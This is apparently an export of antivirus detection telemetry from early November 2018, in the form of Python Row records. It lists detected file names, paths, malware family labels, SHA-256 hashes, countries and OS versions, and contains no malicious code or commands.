  Row(detection=Row(filename='avscan-20181102-060317-f669f463', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060317-F669F463', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052820-14637a67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052820-14637A67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052937-4262577e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052937-4262577E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060249-e5f5f505', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060249-E5F5F505', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060007-84f1cb73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060007-84F1CB73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060427-206ac576', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060427-206AC576', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062257-b5a80ec6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062257-B5A80EC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060140-bcbbe564', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060140-BCBBE564', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053317-c5d78cf4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053317-C5D78CF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051119-b3cad522', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051119-B3CAD522', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052653-e06601a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052653-E06601A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062252-b2e2b506', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062252-B2E2B506', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053409-e4c6a2c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053409-E4C6A2C2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055423-b84da45d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055423-B84DA45D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061559-bccc6900', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061559-BCCC6900', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055929-6e4d9a2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055929-6E4D9A2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062342-d0cbe8fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062342-D0CBE8FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:08:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054146-f51a1554', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054146-F51A1554', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060921-cf7d790d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060921-CF7D790D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054359-445afa5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054359-445AFA5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054441-5d0983b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054441-5D0983B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='awesomiumprocess.exe', filepath='E:\\New folder (2)\\BNS_TW\\bin\\AwesomiumProcess.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='78939e37d9d4a1542b8e13d1e1d41afc72c1e15b2b4be2c33c3c9bbfa2b69ca7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:02:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:55:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060948-df80aa1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060948-DF80AA1C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053753-6a247207', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053753-6A247207', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062646-3e715b42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062646-3E715B42', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062341-d00060be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062341-D00060BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060619-630c02d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060619-630C02D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051713-872dab46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051713-872DAB46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7144458\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:26:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav.exe', filepath='\\\\?\\D:\\Fav.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-13-32-37.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T10:02:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155604-c2808540', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155604-C2808540', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cek.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\ASLI\\RPG\\gaji garment 2013\\CEK\\CEK.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:03:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102049-6a70e589', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3c8c5a5\\AVSCAN-20181101-102004-622836C3\\AVSCAN-20181101-102049-6A70E589', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:20:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='offcln.exe', filepath='\\\\?\\E:\\Backup 03-04-2018\\MS Office 2003\\Microsoft office 2003\\FILES\\PFILES\\MSOFFICE\\OFFICE11\\OFFCLN.EXE', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='28dc12c63f1c9bc70e7fc0730a8e927a4be8740147f4f40a34eb5e2f3db5fa65', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:31:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:02:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180440-67e818d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180100-406F2FA7\\AVSCAN-20181101-180440-67E818D3', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004658', filepath='C:\\Windows\\Temp\\tmp000003f7\\tmp00004658', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='4ea00ff408e9bda8aeb5ad602bc435be38eac4cc5d324529319b7dabdcc76fd9', metadata=Row(cmdline='\\\\\\/service', country='LV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Managed Antivirus\\Managed Antivirus Engine\\Telia Lietuva, AB\\Bitdefender\\EndpointService.exe', parentsize=411576, timestamp='2018-11-01T10:02:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155550-3fd75b36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155550-3FD75B36', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:39:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155846-ddac9f00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155846-DDAC9F00', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jan0312.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\JAN0312\\JAN0312.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154759-70ca6d05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154759-70CA6D05', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='13efd42c8c342922600b9a68ab4a62e950dcacfbcc27642b1b34a2289797f02e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\13EFD42C8C342922600B9A68AB4A62E950DCACFBCC27642B1B34A2289797F02E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='13efd42c8c342922600b9a68ab4a62e950dcacfbcc27642b1b34a2289797f02e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:56:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mei.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\GAJI RPG\\MEI\\MEI.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154955-8439e09e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154955-8439E09E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:43:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Windows\\System32\\DriverStore\\FileRepository\\hdart.inf_x86_neutral_19825fd7f8bfb7f8\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='66a1a8a6501bf73a145118d6843a4f9dd2a397035c65cbccc91422dc3dc394fa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:38:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\uTorrentDir\\mSiExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:40:09Z'), dt=datetime.date(2018, 11, 1)),
